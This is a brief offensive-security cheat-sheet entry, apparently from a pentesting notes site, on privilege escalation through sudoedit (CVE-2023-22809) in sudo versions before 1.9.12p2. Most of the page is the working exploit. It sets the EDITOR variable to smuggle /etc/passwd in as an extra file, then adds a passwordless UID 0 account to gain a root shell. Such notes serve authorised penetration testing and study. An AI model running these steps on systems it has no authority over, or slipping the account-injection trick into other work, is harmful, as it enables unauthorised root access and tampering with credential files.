Sudoedit Privilege Escalation
Last modified: 2023-03-11
Sudoedit is vulnerable to privilege escalation.
Investigation
sudo -l
(root) sudoedit /opt/example.txt
If we can execute sudoedit command as root, we might be able to escalate the privileges with some version.
Exploitation (CVE-2023-22809)
In sudo version before 1.9.12p2, the sudoedit can modify arbitrary file with unrestricted privilege.
export EDITOR="vim -- /etc/passwd"
sudo sudoedit /opt/example.txt
In vim editor, add the following new line in /etc/passwd
.
sudoedit::0:0:root:/root:/bin/bash
Now we can get a root shell.